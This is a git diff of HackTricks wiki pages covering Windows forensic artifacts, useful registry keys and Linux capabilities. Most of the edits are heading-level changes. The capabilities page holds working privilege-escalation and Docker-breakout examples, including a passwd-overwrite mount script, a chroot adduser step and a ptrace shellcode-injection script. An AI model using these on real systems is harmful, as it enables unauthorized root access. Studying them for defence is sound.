@ -182,7 +181,7 @@ Also, inside the `References` and `In-Reply-To` headers you can find the ID of t
|
|||
|
||||
![](<../../../.gitbook/assets/image (484).png>)
|
||||
|
||||
### Windows Mail App
|
||||
#### Windows Mail App
|
||||
|
||||
This application saves the emails in HTML or text. You can find the emails inside subfolders inside `\Users\<username>\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with `.dat` extension.
|
||||
|
||||
|
@ -190,7 +189,7 @@ The **metadata** of the emails and the **contacts** can be found inside the **ED
|
|||
|
||||
**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) to open it. Inside the `Message` table you can see the emails.
|
||||
|
||||
### Microsoft Outlook
|
||||
#### Microsoft Outlook
|
||||
|
||||
When Exchange servers or Outlook clients are used there are going to be some MAPI headers:
|
||||
|
||||
|
@ -210,31 +209,31 @@ You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nuc
|
|||
|
||||
![](<../../../.gitbook/assets/image (485).png>)
|
||||
|
||||
### Outlook OST
|
||||
#### Outlook OST
|
||||
|
||||
When Microsoft Outlook is configured **using** **IMAP** or using an **Exchange** server, it generates a **OST** file that stores almost the same info as the PST file. It keeps the file synchronized with the server for the l**ast 12 months**, with a **max file-size of 50GB** and in the **same folder as the PST** file is saved.
|
||||
|
||||
You can inspect this file using [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html).
|
||||
|
||||
### Recovering Attachments
|
||||
#### Recovering Attachments
|
||||
|
||||
You may be able to find them in the folder:
|
||||
|
||||
* `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` -> IE10
|
||||
* `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` -> IE11+
|
||||
|
||||
### Thunderbird MBOX
|
||||
#### Thunderbird MBOX
|
||||
|
||||
**Thunderbird** stores the information in **MBOX** **files** in the folder `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`
|
||||
|
||||
## Thumbnails
|
||||
### Thumbnails
|
||||
|
||||
When a user access a folder and organised it using thumbnails, then a `thumbs.db` file is created. This db **stores the thumbnails of the images** of the folder even if they are deleted.\
|
||||
in winXP and WIn8-8.1 this file is created automatically. In Win7/Win10, it's created automatically if it's accessed via an UNC path (\IP\folder...).
|
||||
|
||||
It is possible to read this file with the tool [**Thumbsviewer**](https://thumbsviewer.github.io).
|
||||
|
||||
### Thumbcache
|
||||
#### Thumbcache
|
||||
|
||||
Beginning with Windows Vista, **thumbnail previews are stored in a centralized location on the system**. This provides the system with access to images independent of their location, and addresses issues with the locality of Thumbs.db files. The cache is stored at **`%userprofile%\AppData\Local\Microsoft\Windows\Explorer`** as a number of files with the label **thumbcache\_xxx.db** (numbered by size); as well as an index used to find thumbnails in each sized database.
|
||||
|
||||
|
@ -245,7 +244,7 @@ Beginning with Windows Vista, **thumbnail previews are stored in a centralized l
|
|||
|
||||
You can read this file using [**ThumbCache Viewer**](https://thumbcacheviewer.github.io).
|
||||
|
||||
## Windows Registry
|
||||
### Windows Registry
|
||||
|
||||
The Windows Registry Contains a lot of **information** about the **system and the actions of the users**.
|
||||
|
||||
|
@ -261,7 +260,7 @@ The files containing the registry are located in:
|
|||
From Windows Vista and Windows 2008 Server upwards there are some backups of the `HKEY_LOCAL_MACHINE` registry files in **`%Windir%\System32\Config\RegBack\`**.\
|
||||
Also from these versions, the registry file **`%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT`** is created saving information about program executions.
|
||||
|
||||
### Tools
|
||||
#### Tools
|
||||
|
||||
Some tools are useful to analyzed the registry files:
|
||||
|
||||
|
@ -270,28 +269,28 @@ Some tools are useful to analyzed the registry files:
|
|||
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Again, it has a GUI that allows to navigate through the loaded registry and also contains plugins that highlight interesting information inside the loaded registry.
|
||||
* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Another GUI application capable of extracting the important information from the registry loaded.
|
||||
|
||||
### Recovering Deleted Element
|
||||
#### Recovering Deleted Element
|
||||
|
||||
When a key is deleted it's marked as such but until the space it's occupying is needed it won't be removed. Therefore, using tools like **Registry Explorer** it's possible to recover these deleted keys.
|
||||
|
||||
### Last Write Time
|
||||
#### Last Write Time
|
||||
|
||||
Each Key-Value contains a **timestamp** indicating the last time it was modified.
|
||||
|
||||
### SAM
|
||||
#### SAM
|
||||
|
||||
The file/hive **SAM** contains the **users, groups and users passwords** hashes of the system.\
|
||||
In `SAM\Domains\Account\Users` you can obtain the username, the RID, last logon, last failed logon, login counter, password policy and when the account was created. In order to get the **hashes** you also **need** the file/hive **SYSTEM**.
|
||||
|
||||
### Interesting entries in the Windows Registry
|
||||
#### Interesting entries in the Windows Registry
|
||||
|
||||
{% content-ref url="interesting-windows-registry-keys.md" %}
|
||||
[interesting-windows-registry-keys.md](interesting-windows-registry-keys.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Programs Executed
|
||||
### Programs Executed
|
||||
|
||||
### Basic Windows Processes
|
||||
#### Basic Windows Processes
|
||||
|
||||
in the following page you can learn about the basic Windows processes to detect suspicious behaviours:
|
||||
|
||||
|
@ -299,15 +298,15 @@ in the following page you can learn about the basic Windows processes to detect
|
|||
[windows-processes.md](windows-processes.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Windows RecentAPPs
|
||||
#### Windows RecentAPPs
|
||||
|
||||
Inside the registry `NTUSER.DAT` in the path `Software\Microsoft\Current Version\Search\RecentApps` you can subkeys with information about the **application executed**, **last time** it was executed, and **number of times** it was launched.
|
||||
|
||||
### BAM
|
||||
#### BAM
|
||||
|
||||
You can open the `SYSTEM` file with a registry editor and inside the path `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` you can find the information about the **applications executed by each user** (note the `{SID}` in the path) and at **what time** they were executed (the time is inside the Data value of the registry).
|
||||
|
||||
### Windows Prefetch
|
||||
#### Windows Prefetch
|
||||
|
||||
Prefetching is a technique that allows a computer to silently **fetch the necessary resources needed to display content** that a user **might access in the near future** so resources can be accessed in less time.
|
||||
|
||||
|
@ -327,7 +326,7 @@ To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/E
|
|||
|
||||
![](<../../../.gitbook/assets/image (487).png>)
|
||||
|
||||
### Superprefetch
|
||||
#### Superprefetch
|
||||
|
||||
**Superprefetch** has the same goal as prefetch, **load programs faster** by predicting what is going to be loaded next. However, it doesn't substitute the prefetch service.\
|
||||
This service will generate database files in `C:\Windows\Prefetch\Ag*.db`.
|
||||
|
@ -336,7 +335,7 @@ In these databases you can find the **name** of the **program**, **number** of *
|
|||
|
||||
You can access this information using the tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/).
|
||||
|
||||
### SRUM
|
||||
#### SRUM
|
||||
|
||||
**System Resource Usage Monitor** (SRUM) **monitors** the **resources** **consumed** **by a process**. It appeared in W8 and it stores the data en an ESE database located in `C:\Windows\System32\sru\SRUDB.dat`.
|
||||
|
||||
|
@ -358,7 +357,7 @@ You can obtain the date from this file using the tool [**srum\_dump**](https://g
|
|||
.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
|
||||
```
|
||||
|
||||
### AppCompatCache (ShimCache)
|
||||
#### AppCompatCache (ShimCache)
|
||||
|
||||
**Shimcache**, also known as **AppCompatCache**, is a component of the **Application Compatibility Database**, which was created by **Microsoft** and used by the operating system to identify application compatibility issues.
|
||||
|
||||
|
@ -382,7 +381,7 @@ You can use the tool [**AppCompatCacheParser**](https://github.com/EricZimmerman
|
|||
|
||||
![](<../../../.gitbook/assets/image (488).png>)
|
||||
|
||||
### Amcache
|
||||
#### Amcache
|
||||
|
||||
The **Amcache.hve** file is a registry file that stores the information of executed applications. It's located in `C:\Windows\AppCompat\Programas\Amcache.hve`
|
||||
|
||||
|
@ -396,21 +395,21 @@ AmcacheParser.exe -f C:\Users\student\Desktop\Amcache.hve --csv C:\Users\student
|
|||
|
||||
The most interesting CVS file generated if the `Amcache_Unassociated file entries`.
|
||||
|
||||
### RecentFileCache
|
||||
#### RecentFileCache
|
||||
|
||||
This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries.
|
||||
|
||||
You can use the tool [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) to parse the file.
|
||||
|
||||
### Scheduled tasks
|
||||
#### Scheduled tasks
|
||||
|
||||
You can extract them from `C:\Windows\Tasks` or `C:\Windows\System32\Tasks` and read them as XML.
|
||||
|
||||
### Services
|
||||
#### Services
|
||||
|
||||
You can find them in the registry under `SYSTEM\ControlSet001\Services`. You can see what is going to be executed and when.
|
||||
|
||||
### **Windows Store**
|
||||
#### **Windows Store**
|
||||
|
||||
The installed applications can be found in `\ProgramData\Microsoft\Windows\AppRepository\`\
|
||||
This repository has a **log** with **each application installed** in the system inside the database **`StateRepository-Machine.srd`**.
|
||||
|
@ -420,7 +419,7 @@ Inside the Application table of this database it's possible to find the columns:
|
|||
It's also possible to **find installed application** inside the registry path: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
|
||||
And **uninstalled** **applications** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
|
||||
|
||||
## Windows Events
|
||||
### Windows Events
|
||||
|
||||
Information that appears inside Windows events:
|
||||
|
||||
|
@ -438,7 +437,7 @@ The location of the event files can be found in the SYSTEM registry in **`HKLM\S
|
|||
|
||||
They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com) **or** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
|
||||
|
||||
### Security
|
||||
#### Security
|
||||
|
||||
These event register the accesses and give information about the security configuration.\
|
||||
they can be found in `C:\Windows\System32\winevt\Security.evtx`.
|
||||
|
@ -477,22 +476,22 @@ The Status and sub status information of the event s can indicate more details a
|
|||
|
||||
![](<../../../.gitbook/assets/image (455).png>)
|
||||
|
||||
### Recovering Windows Events
|
||||
#### Recovering Windows Events
|
||||
|
||||
It's highly recommended to turn off the suspicious PC by **unplugging it** to maximize the probabilities of recovering the Windows Events. In case they were deleted, a tool that can be useful to try to recover them is [**Bulk\_extractor**](../partitions-file-systems-carving/file-data-carving-recovery-tools.md#bulk-extractor) indicating the **evtx** extension.
|
||||
|
||||
## Identifying Common Attacks with Windows Events
|
||||
### Identifying Common Attacks with Windows Events
|
||||
|
||||
### Brute-Force Attack
|
||||
#### Brute-Force Attack
|
||||
|
||||
A brute-force attack can be easily identifiable because **several EventIDs 4625 will appear**. **If** the attack was **successful**, after the EventIDs 4625, **an EventID 4624 will appear**.
|
||||
|
||||
### Time Change
|
||||
#### Time Change
|
||||
|
||||
This is awful for the forensics team as all the timestamps will be modified.\
|
||||
This event is recorded by the EventID 4616 inside the Security Event log.
|
||||
|
||||
### USB devices
|
||||
#### USB devices
|
||||
|
||||
The following System EventIDs are useful:
|
||||
|
||||
|
@ -501,15 +500,14 @@ The following System EventIDs are useful:
|
|||
|
||||
The EventID 112 from DeviceSetupManager contains the timestamp of each USB device inserted.
|
||||
|
||||
### Turn Off / Turn On
|
||||
#### Turn Off / Turn On
|
||||
|
||||
The ID 6005 of the "Event Log" service indicates the PC was turned On. The ID 6006 indicates it was turned Off.
|
||||
|
||||
### Logs Deletion
|
||||
#### Logs Deletion
|
||||
|
||||
The Security EventID 1102 indicates the logs were deleted.
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -525,5 +523,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Interesting Windows Registry Keys
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,40 +16,39 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## Interesting Windows Registry Keys
|
||||
|
||||
# Interesting Windows Registry Keys
|
||||
### **Windows system info**
|
||||
|
||||
## **Windows system info**
|
||||
|
||||
### Version
|
||||
#### Version
|
||||
|
||||
* **`Software\Microsoft\Windows NT\CurrentVersion`**: Windows version, Service Pack, Installation time and the registered owner
|
||||
|
||||
### Hostname
|
||||
#### Hostname
|
||||
|
||||
* **`System\ControlSet001\Control\ComputerName\ComputerName`**: Hostname
|
||||
|
||||
### Timezone
|
||||
#### Timezone
|
||||
|
||||
* **`System\ControlSet001\Control\TimeZoneInformation`**: TimeZone
|
||||
|
||||
### Last Access Time
|
||||
#### Last Access Time
|
||||
|
||||
* **`System\ControlSet001\Control\Filesystem`**: Last time access (by default it's disabled with `NtfsDisableLastAccessUpdate=1`, if `0`, then, it's enabled).
|
||||
* To enable it: `fsutil behavior set disablelastaccess 0`
|
||||
|
||||
### Shutdown Time
|
||||
#### Shutdown Time
|
||||
|
||||
* `System\ControlSet001\Control\Windows`: Shutdown time
|
||||
* `System\ControlSet001\Control\Watchdog\Display`: Shutdown count (only XP)
|
||||
|
||||
### Network Information
|
||||
#### Network Information
|
||||
|
||||
* **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**: Network interfaces
|
||||
* **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed` & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache`**: First and last time a network connection was performed and connections through VPN
|
||||
* **`Software\Microsoft\WZCSVC\Parameters\Interfaces{GUID}` (for XP) & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles`**: Network type (0x47-wireless, 0x06-cable, 0x17-3G) an category (0-Public, 1-Private/Home, 2-Domain/Work) and last connections
|
||||
|
||||
### Shared Folders
|
||||
#### Shared Folders
|
||||
|
||||
* **`System\ControlSet001\Services\lanmanserver\Shares\`**: Share folders and their configurations. If **Client Side Caching** (CSCFLAGS) is enabled, then, a copy of the shared files will be saved in the clients and server in `C:\Windows\CSC`
|
||||
* CSCFlag=0 -> By default the user needs to indicate the files that he wants to cache
|
||||
|
@ -59,7 +58,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
* CSCFlag=2048: This setting is only on Win 7 & 8 and is the default setting until you disable “Simple file sharing” or use the “advanced” sharing option. It also appears to be the default setting for the “Homegroup”
|
||||
* CSCFlag=768 -> This setting was only seen on shared Print devices.
|
||||
|
||||
### AutoStart programs
|
||||
#### AutoStart programs
|
||||
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce`
|
||||
|
@ -67,15 +66,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
* `Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`
|
||||
* `Software\Microsoft\Windows\CurrentVersion\Run`
|
||||
|
||||
### Explorer Searches
|
||||
#### Explorer Searches
|
||||
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordwheelQuery`: What the user searched for using explorer/helper. The item with `MRU=0` is the last one.
|
||||
|
||||
### Typed Paths
|
||||
#### Typed Paths
|
||||
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths`: Paths types in the explorer (only W10)
|
||||
|
||||
### Recent Docs
|
||||
#### Recent Docs
|
||||
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`: Recent documents opened by the user
|
||||
* `NTUSER.DAT\Software\Microsoft\Office{Version}{Excel|Word}\FileMRU`:Recent office docs. Versions:
|
||||
|
@ -87,7 +86,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
* 15.0 office 2013
|
||||
* 16.0 Office 2016
|
||||
|
||||
### MRUs
|
||||
#### MRUs
|
||||
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU`
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LasVisitedPidlMRU`
|
||||
|
@ -99,12 +98,12 @@ Indicates the path from where the executable was executed
|
|||
|
||||
Indicates files opened inside an opened Window
|
||||
|
||||
### Last Run Commands
|
||||
#### Last Run Commands
|
||||
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\Policies\RunMR`
|
||||
|
||||
### User AssistKey
|
||||
#### User AssistKey
|
||||
|
||||
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`
|
||||
|
||||
|
@ -115,7 +114,7 @@ The GUID is the id of the application. Data saved:
|
|||
* GUI application name (this contains the abs path and more information)
|
||||
* Focus time and Focus name
|
||||
|
||||
## Shellbags
|
||||
### Shellbags
|
||||
|
||||
When you open a directory Windows saves data about how to visualize the directory in the registry. These entries are known as Shellbags.
|
||||
|
||||
|
@ -138,9 +137,9 @@ Note 2 things from the following image:
|
|||
|
||||
![](<../../../.gitbook/assets/image (475).png>)
|
||||
|
||||
## USB information
|
||||
### USB information
|
||||
|
||||
### Device Info
|
||||
#### Device Info
|
||||
|
||||
The registry `HKLM\SYSTEM\ControlSet001\Enum\USBSTOR` monitors each USB device that has been connected to the PC.\
|
||||
Within this registry it's possible to find:
|
||||
|
@ -152,7 +151,7 @@ Within this registry it's possible to find:
|
|||
|
||||
![](<../../../.gitbook/assets/image (477).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (479) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (479) (1) (1).png>)
|
||||
|
||||
Moreover, checking the registry `HKLM\SYSTEM\ControlSet001\Enum\USB` and comparing the values of the sub-keys it's possible to find the VID value
|
||||
|
||||
|
@ -162,19 +161,19 @@ With the previous information the registry `SOFTWARE\Microsoft\Windows Portable
|
|||
|
||||
![](<../../../.gitbook/assets/image (480).png>)
|
||||
|
||||
### User that used the device
|
||||
#### User that used the device
|
||||
|
||||
Having the **{GUID}** of the device it's now possible to **check all the NTUDER.DAT hives of all the users** searching for the GUID until you find it in one of them (`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2`)
|
||||
|
||||
![](<../../../.gitbook/assets/image (481).png>)
|
||||
|
||||
### Last mounted
|
||||
#### Last mounted
|
||||
|
||||
Checking the registry `System\MoutedDevices` it's possible to find out **which device was the last one mounted**. In the following image check how the last device mounted in `E:` is the Thoshiba one (using the tool Registry Explorer).
|
||||
|
||||
![](<../../../.gitbook/assets/image (483) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (483) (1).png>)
|
||||
|
||||
### Volume Serial Number
|
||||
#### Volume Serial Number
|
||||
|
||||
In `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` you can find the volume serial number. **Knowing the volume name and the volume serial number you can correlate the information** from LNK files that uses that information.
|
||||
|
||||
|
@ -184,7 +183,7 @@ Note that when a USB device is formatted:
|
|||
* A new volume serial number is created
|
||||
* The physical serial number is kept
|
||||
|
||||
### Timestamps
|
||||
#### Timestamps
|
||||
|
||||
In `System\ControlSet001\Enum\USBSTOR{VEN_PROD_VERSION}{USB serial}\Properties{83da6326-97a6-4088-9453-a1923f573b29}\` you can find the first and last time the device was connected:
|
||||
|
||||
|
@ -194,7 +193,6 @@ In `System\ControlSet001\Enum\USBSTOR{VEN_PROD_VERSION}{USB serial}\Properties{8
|
|||
|
||||
![](<../../../.gitbook/assets/image (482).png>)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -210,5 +208,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Linux Capabilities
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,22 +16,21 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## Linux Capabilities
|
||||
|
||||
# Linux Capabilities
|
||||
|
||||
## Capabilities
|
||||
### Capabilities
|
||||
|
||||
Linux capabilities **provide a subset of the available root privileges** to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation.
|
||||
|
||||
### Why capabilities?
|
||||
#### Why capabilities?
|
||||
|
||||
To better understand how Linux capabilities work, let’s have a look first at the problem it tries to solve.
|
||||
|
||||
Let’s assume we are running a process as a normal user. This means we are non-privileged. We can only access data that owned by us, our group, or which is marked for access by all users. At some point in time, our process needs a little bit more permissions to fulfill its duties, like opening a network socket. The problem is that normal users can not open a socket, as this requires root permissions.
|
||||
|
||||
### Capabilities Sets
|
||||
#### Capabilities Sets
|
||||
|
||||
#### Inherited capabilities
|
||||
**Inherited capabilities**
|
||||
|
||||
**CapEff**: The _effective_ capability set represents all capabilities the process is using at the moment (this is the actual set of capabilities that the kernel uses for permission checks). For file capabilities the effective set is in fact a single bit indicating whether the capabilities of the permitted set will be moved to the effective set upon running a binary. This makes it possible for binaries that are not capability-aware to make use of file capabilities without issuing special system calls.
|
||||
|
||||
|
@ -48,9 +47,9 @@ For a detailed explanation of the difference between capabilities in threads and
|
|||
* [https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work](https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work)
|
||||
* [https://blog.ploetzli.ch/2014/understanding-linux-capabilities/](https://blog.ploetzli.ch/2014/understanding-linux-capabilities/)
|
||||
|
||||
## Processes & Binaries Capabilities
|
||||
### Processes & Binaries Capabilities
|
||||
|
||||
### Processes Capabilities
|
||||
#### Processes Capabilities
|
||||
|
||||
To see the capabilities for a particular process, use the **status** file in the /proc directory. As it provides more details, let’s limit it only to the information related to Linux capabilities.\
|
||||
Note that for all running processes capability information is maintained per thread, for binaries in the file system it’s stored in extended attributes.
|
||||
|
@ -131,7 +130,7 @@ $ capsh --decode=0000000000003000
|
|||
As you can see the given capabilities corresponds with the results of the 2 ways of getting the capabilities of a binary.\
|
||||
The _getpcaps_ tool uses the **capget()** system call to query the available capabilities for a particular thread. This system call only needs to provide the PID to obtain more information.
|
||||
|
||||
### Binaries Capabilities
|
||||
#### Binaries Capabilities
|
||||
|
||||
Binaries can have capabilities that can be used while executing. For example, it's very common to find `ping` binary with `cap_net_raw` capability:
|
||||
|
||||
|
@ -146,7 +145,7 @@ You can **search binaries with capabilities** using:
|
|||
getcap -r / 2>/dev/null
|
||||
```
|
||||
|
||||
### Dropping capabilities with capsh
|
||||
#### Dropping capabilities with capsh
|
||||
|
||||
If we drop the CAP\_NET\_RAW capabilities for _ping_, then the ping utility should no longer work.
|
||||
|
||||
|
@ -160,7 +159,7 @@ Besides the output of _capsh_ itself, the _tcpdump_ command itself should also r
|
|||
|
||||
The error clearly shows that the ping command is not allowed to open an ICMP socket. Now we know for sure that this works as expected.
|
||||
|
||||
### Remove Capabilities
|
||||
#### Remove Capabilities
|
||||
|
||||
You can remove capabilities of a binary with
|
||||
|
||||
|
@ -168,7 +167,7 @@ You can remove capabilities of a binary with
|
|||
setcap -r </path/to/binary>
|
||||
```
|
||||
|
||||
## User Capabilities
|
||||
### User Capabilities
|
||||
|
||||
Apparently **it's possible to assign capabilities also to users**. This probably means that every process executed by the user will be able to use the users capabilities.\
|
||||
Base on on [this](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [this ](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html)and [this ](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user)a few files new to be configured to give a user certain capabilities but the one assigning the capabilities to each user will be `/etc/security/capability.conf`.\
|
||||
|
@ -188,7 +187,7 @@ cap_net_admin,cap_net_raw jrnetadmin
|
|||
cap_sys_admin,22,25 jrsysadmin
|
||||
```
|
||||
|
||||
## Environment Capabilities
|
||||
### Environment Capabilities
|
||||
|
||||
Compiling the following program it's possible to **spawn a bash shell inside an environment that provides capabilities**.
|
||||
|
||||
|
@ -301,11 +300,11 @@ Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip
|
|||
You can **only add capabilities that are present** in both the permitted and the inheritable sets.
|
||||
{% endhint %}
|
||||
|
||||
### Capability-aware/Capability-dumb binaries
|
||||
#### Capability-aware/Capability-dumb binaries
|
||||
|
||||
The **capability-aware binaries won't use the new capabilities** given by the environment, however the **capability dumb binaries will us**e them as they won't reject them. This makes capability-dumb binaries vulnerable inside a special environment that grant capabilities to binaries.
|
||||
|
||||
## Service Capabilities
|
||||
### Service Capabilities
|
||||
|
||||
By default a **service running as root will have assigned all the capabilities**, and in some occasions this may be dangerous.\
|
||||
Therefore, a **service configuration** file allows to **specify** the **capabilities** you want it to have, **and** the **user** that should execute the service to avoid running a service with unnecessary privileges:
|
||||
|
@ -316,7 +315,7 @@ User=bob
|
|||
AmbientCapabilities=CAP_NET_BIND_SERVICE
|
||||
```
|
||||
|
||||
## Capabilities in Docker Containers
|
||||
### Capabilities in Docker Containers
|
||||
|
||||
By default Docker assigns a few capabilities to the containers. It's very easy to check which capabilities are these by running:
|
||||
|
||||
|
@ -335,7 +334,7 @@ docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash
|
|||
docker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash
|
||||
```
|
||||
|
||||
## Malicious Use
|
||||
### Malicious Use
|
||||
|
||||
Capabilities are useful when you **want to restrict your own processes after performing privileged operations** (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root.
|
||||
|
||||
|
@ -358,7 +357,7 @@ To identify programs in a system or folder with capabilities:
|
|||
getcap -r / 2>/dev/null
|
||||
```
|
||||
|
||||
### Exploitation example
|
||||
#### Exploitation example
|
||||
|
||||
In the following example the binary `/usr/bin/python2.6` is found vulnerable to privesc:
|
||||
|
||||
|
@ -378,7 +377,7 @@ getcap /usr/sbin/tcpdump
|
|||
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
|
||||
```
|
||||
|
||||
### The special case of "empty" capabilities
|
||||
#### The special case of "empty" capabilities
|
||||
|
||||
Note that one can assign empty capability sets to a program file, and thus it is possible to create a set-user-ID-root program that changes the effective and saved set-user-ID of the process that executes the program to 0, but confers no capabilities to that process. Or, simply put, if you have a binary that:
|
||||
|
||||
|
@ -388,11 +387,11 @@ Note that one can assign empty capability sets to a program file, and thus it is
|
|||
|
||||
then **that binary will run as root**.
|
||||
|
||||
### CAP\_SYS\_ADMIN
|
||||
#### CAP\_SYS\_ADMIN
|
||||
|
||||
[**CAP\_SYS\_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) is largely a catchall capability, it can easily lead to additional capabilities or full root (typically access to all capabilities). `CAP_SYS_ADMIN` is required to perform a range of **administrative operations**, which is difficult to drop from containers if privileged operations are performed within the container. Retaining this capability is often necessary for containers which mimic entire systems versus individual application containers which can be more restrictive. Among other things this allows to **mount devices** or abuse **release\_agent** to escape from the container.
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
```bash
|
||||
getcap -r / 2>/dev/null
|
||||
|
@ -424,7 +423,7 @@ libc.mount(source, target, filesystemtype, mountflags, options)
|
|||
|
||||
And you will be able to **`su` as root** using password "password".
|
||||
|
||||
#### Example with environment (Docker breakout)
|
||||
**Example with environment (Docker breakout)**
|
||||
|
||||
You can check the enabled capabilities inside the docker container using:
|
||||
|
||||
|
@ -478,13 +477,13 @@ chroot /mnt/ adduser john
|
|||
ssh john@172.17.0.1 -p 2222
|
||||
```
|
||||
|
||||
### CAP\_SYS\_PTRACE
|
||||
#### CAP\_SYS\_PTRACE
|
||||
|
||||
**This means that you can escape the container by injecting a shellcode inside some process running inside the host.** To access processes running inside the host the container needs to be run at least with **`--pid=host`**.
|
||||
|
||||
[**CAP\_SYS\_PTRACE**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows to use `ptrace(2)` and recently introduced cross memory attach system calls such as `process_vm_readv(2)` and `process_vm_writev(2)`. If this capability is granted and the `ptrace(2)` system call itself is not blocked by a seccomp filter, this will allow an attacker to bypass other seccomp restrictions, see [PoC for bypassing seccomp if ptrace is allowed](https://gist.github.com/thejh/8346f47e359adecd1d53) or the **following PoC**:
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
```bash
|
||||
getcap -r / 2>/dev/null
|
||||
|
@ -578,7 +577,7 @@ print("Final Instruction Pointer: " + hex(registers.rip))
|
|||
libc.ptrace(PTRACE_DETACH, pid, None, None)
|
||||
```
|
||||
|
||||
#### Example with environment (Docker breakout) - Shellcode Injection
|
||||
**Example with environment (Docker breakout) - Shellcode Injection**
|
||||
|
||||
You can check the enabled capabilities inside the docker container using:
|
||||
|
||||
|
@ -603,7 +602,7 @@ List **processes** running in the **host** `ps -eaf`
|
|||
